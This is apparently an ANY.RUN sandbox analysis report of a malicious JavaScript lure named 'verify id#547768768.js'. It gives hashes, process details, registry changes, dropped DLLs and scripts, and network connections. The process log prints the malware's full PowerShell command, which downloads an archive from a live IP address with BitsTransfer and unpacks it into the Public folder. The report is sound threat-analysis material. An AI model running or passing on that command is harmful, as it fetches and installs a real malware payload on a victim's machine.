File name:

verify id#547768768.js

Full analysis: https://app.any.run/tasks/8cccef35-a9fc-4d9a-ba77-6b44fb751806
Verdict: Malicious activity
Analysis date: December 02, 2023, 16:41:52
OS: Windows 7 Professional Service Pack 1 (build: 7601, 64 bit)
Tags:
opendir
Indicators:
MIME: text/plain
File info: ASCII text, with very long lines, with CRLF line terminators
MD5:

FFBABE4855B1647A121BE0A7D3340350

SHA1:

5C2D168562A154D58451D4A7F2B9DA5BF7BFF7A4

SHA256:

978BF1471B3536DFDEA854DD1C5D8EE63BDFBC8223C0254A92B183A711699A3A

SSDEEP:

48:SAsXiBD0V/LCuX5shc1CqMe3TCinBUps35b1kkP8OFzNQdPUpvWQahKzaay:nsXi1MvX1CqLnp5bym5QdXszaay

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Probably downloads file via BitsAdmin

      • powershell.exe (PID: 1612)
  • SUSPICIOUS

    • Reads the Internet Settings

      • wscript.exe (PID: 1584)
      • powershell.exe (PID: 1612)
      • wscript.exe (PID: 2844)
    • Found IP address in command line

      • powershell.exe (PID: 1612)
    • Starts POWERSHELL.EXE for commands execution

      • wscript.exe (PID: 1584)
    • The process executes JS scripts

      • wscript.exe (PID: 1584)
    • Application launched itself

      • wscript.exe (PID: 1584)
    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 2844)
      • wscript.exe (PID: 1584)
  • INFO

    • Checks supported languages

      • node.exe (PID: 1000)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
38
Monitored processes
4
Malicious processes
1
Suspicious processes
2

Behavior graph

Click at the process to see the details
start wscript.exe no specs powershell.exe no specs wscript.exe no specs node.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
1000"C:\Users\Public\node.exe" C:\Users\Public\install.jsC:\Users\Public\node.exewscript.exe
User:
admin
Company:
Node.js
Integrity Level:
MEDIUM
Description:
Node.js JavaScript Runtime
Exit code:
216
Version:
18.18.2
Modules
Images
c:\users\public\node.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\dbghelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\nsi.dll
c:\windows\system32\iphlpapi.dll
1584"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\verify id#547768768.js"C:\Windows\System32\wscript.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
1612"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-BitsTransfer -Source 'http://185.81.157.148:777/j.jpg' -Destination 'C:\Users\Public\ben.zip';Expand-Archive -Path 'C:\Users\Public\ben.zip' -DestinationPath 'C:\Users\Public\' -ForceC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exewscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
2844"C:\Windows\System32\WScript.exe" "C:\Users\Public\shell.js" C:\Windows\System32\wscript.exewscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
Total events
2 140
Read events
2 102
Write events
38
Delete events
0

Modification events

(PID) Process:(1584) wscript.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(1584) wscript.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
(PID) Process:(1584) wscript.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
1
(PID) Process:(1584) wscript.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
0
(PID) Process:(1612) powershell.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(1612) powershell.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
(PID) Process:(1612) powershell.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
1
(PID) Process:(1612) powershell.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
0
(PID) Process:(1612) powershell.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\15A\52C64B7E
Operation:writeName:LanguageList
Value:
en-US
(PID) Process:(2844) wscript.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
Executable files
0
Suspicious files
3
Text files
13
Unknown types
0

Dropped files

PID
Process
Filename
Type
1612powershell.exeC:\Users\Public\node.exe
MD5:
SHA256:
1612powershell.exeC:\Users\Public\app.jstext
MD5:A307C4557D5FDF209E1B38A803E03B52
SHA256:3A16F15174757A5F84AE743DB042B62B2554620118DE63BE2E7086827F114BF5
1612powershell.exeC:\Users\admin\AppData\Local\Temp\h3lmbrfz.rh5.psm1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:
1612powershell.exeC:\Users\Public\Execute.dlltext
MD5:529CF04DB0F736467C7583EA80C3AA66
SHA256:67642E56281BC4AA846689BC725F8FCC76E61C20831AA4F7E2E0C8CDBA17E520
1612powershell.exeC:\Users\Public\runpe.dlltext
MD5:BE92F1480679D6BB88CA61CFF125BE40
SHA256:39D666E2A76BD47FB73DD712A8BF30DDE586C43CB483E6E4DBD180E3701A1343
1612powershell.exeC:\Users\Public\shell.jstext
MD5:D71E2D55EE0534B06313F71AEFD921B9
SHA256:43BDD5E0B846271A4BAE3A4F74C8310B914497ABD2FFE0E1886EC9FEC9F25ECD
1612powershell.exeC:\Users\Public\type.dlltext
MD5:BE784E48D0174367297B636456C7BCF1
SHA256:510760F4C6F7FB3B5B332CD7D3A2F674235B0F58D77DBC3972ADAF682A168136
1612powershell.exeC:\Users\Public\xx.dlltext
MD5:14C2A6B7BF15E15D8DAE9CD4A56432D5
SHA256:79891821778C4CA9358C27E7FB66B0442A2921B661DF1293E398B18D81DA5D96
1612powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:7ABBDBFB58185FEEE3C8077485CAE91D
SHA256:F1E318E0BB09C86FCF4B1179632D48BAE1FB978A8243B40DFE0CF0F09A915606
1612powershell.exeC:\Users\Public\invoke.dlltext
MD5:B9376E9E3C4D48F5E35A3F355AE1F74A
SHA256:90092E5FB861DD4FF34FA20F4B31CA44EBBB3BC367A8D7A35B89A7F89C793FA9
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
6
DNS requests
0
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
884
svchost.exe
HEAD
200
185.81.157.148:777
http://185.81.157.148:777/j.jpg
unknown
unknown
884
svchost.exe
GET
200
185.81.157.148:777
http://185.81.157.148:777/j.jpg
unknown
compressed
23.9 Mb
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
1956
svchost.exe
239.255.255.250:1900
whitelisted
4
System
192.168.100.255:138
whitelisted
4
System
192.168.100.255:137
whitelisted
324
svchost.exe
224.0.0.252:5355
unknown
884
svchost.exe
185.81.157.148:777
Inulogic Sarl
FR
unknown

DNS requests

No data

Threats

No threats detected
No debug info